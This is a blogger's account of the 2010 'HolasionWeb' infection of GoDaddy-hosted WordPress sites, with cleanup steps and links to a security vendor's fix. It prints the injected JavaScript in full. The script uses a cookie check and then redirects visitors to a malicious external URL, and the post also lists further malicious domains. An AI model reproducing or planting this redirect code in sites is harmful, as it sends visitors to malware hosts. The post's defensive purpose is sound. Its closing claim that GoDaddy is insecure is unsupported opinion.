GoDaddy WordPress Sites Infected by HolasionWeb Malicious Code

Have you gotten calls from your clients hosted on GoDaddy about their WordPress site's being 'hacked'? Or perhaps this happened to you yourself. It seems there's a new report of thousands of WordPress sites being infected by malicious javascript inserted on their WordPress website.

It's not everyday that WordPress gets 'hacked' by something/one.  Today one of my clients sent me a very distressed email claiming their site had been hacked.  I thought that they were probably mistaken, but apparently not.  It appears that a malicious piece of JavaScript is infecting WordPress sites.  Most, if not all, hosted on WordPress.  This WordPress infection by 'holasionweb.com' appears to set a cookie and has ill intentions.  Let's take a look at what this attack is and how to fix it.

What WordPress Versions are Potentially Infected?

This has been seen on versions up to WordPress version 2.9.2.

What Does it Do to My WordPress FrontEnd?

Nothing much, you may not see any change at all unless you have a virus protection program installed and a flag is raised by that software when you go to your site in the browser.

What About the WordPress Admin Area?

This is where you will notice something has gone wrong.  Take a look at this screenshot: You can immediately tell there's something wrong here.

What Does the Malicious Code Look Like?

Here's a look at the malicious code:

function setCookie(c_name,value,expiredays){
	var exdate=new Date();
	exdate.setDate(exdate.getDate()+expiredays);
	document.cookie=c_name+ "=" +escape(value)+
	((expiredays==null) ? "" : ";expires="+exdate.toGMTString());
}


function getCookie(c_name){
if (document.cookie.length>0)
  {
  c_start=document.cookie.indexOf(c_name + "=");
  if (c_start!=-1)
    {
    c_start=c_start + c_name.length+1;
    c_end=document.cookie.indexOf(";",c_start);
    if (c_end==-1) c_end=document.cookie.length;
    return unescape(document.cookie.substring(c_start,c_end));
    }
  }
return "";
}


var name=getCookie("pma_visited_theme1");
if (name==""){
	setCookie("pma_visited_theme1","1",20);
	var url="http://www4.suitcase52td.net/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG2dXseYlWibZmeWmQ%3D%3D";
	window.top.location.replace(url);
}else{


}

Take a look at the script above, this is the problem.

Ok, So How Do I Fix the 'HolasionWeb' WordPress GoDaddy Issue?!

Download this fix that will detect the script on your site and get rid of it: Download HoliasionWeb.com Malicious Script WordPress Fix

Instructions for running the WordPress hack fix

1. Unzip and Upload the php file via FTP to your home directory
2. Navigate your browser to http://mywebsite.com/wordpress-fix.php where 'mywebsite' is your domain to start the fix note: the fix may take a few minutes to run
3. When it says complete, check to see if it's actually fixed and you're good to go!

Here's a link to the original solution: http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html This seems to have worked for my instance.  Here's the link to the release that tipped me off on this... http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html http://sucuri.net/malware/entry/MW:MROBH:1 Other domains where's this malicious script has been: http://www.indesignstudioinfo.com/ls.php http://zettapetta.com/js.php http://holasionweb.com/oo.php

Lesson Here: Do Not Host with Go Daddy!

They are insecure, unreliable and have terrible support.

Related posts:

1. Link separators for wp_list_pages() code snippet WordPress makes it very easy to dynamically create menus from pages and categories with the use of the function wp_list_pages() and wp_list_cats()... but what if you want to have separators in your menus? Here's a bit of code that will do just that: wp_list_pages Separators [inline] $args = array( 'sort_column' => 'menu_order', 'title_li' => '', [...]...
2. WordPress List Subpages Even if On Subpage I'm building a new site and the navigation on it requires me to use a different bit of code for parent and child pages. I thought I'd share the code for those out there building a similar navigation. Here's a handy bit of code that you can use to display all subpages on a subpage. [...]...
3. How To Install WordPress on a Go Daddy Hosting Account If you are a GoDaddy user and you'd like to setup a blogging platform you will first need to make sure you have a Hosting account in addition to a domain name. Do you have this? Ok, good. Now I'll tell you that you will definitely want to use WordPress because of too many reasons [...]...
4. WordPress Lavalamp Navigation Tutorial Lavalamp is an awesome jQuery plug-in that makes really cool effects for WordPress-based menus and navigation links, and as a bonus it is very lightweight. It can be a bit tricky to implement in WordPress, but after you read this tutorial hopefully you'll be implementing it with ease. Follow along and let's get your site's [...]...
5. WordPress Fix: Attribute “role” is not a valid attribute I like to design websites that are W3C Compliant.  Your WordPress theme may require some tweaking to be valid.  One error I kept receiving was: Attribute "role" is not a valid attribute. Did you mean "frameborder" or "scrolling"?  I will show you how to correct this error.  Simply put, to correct the error we are [...]...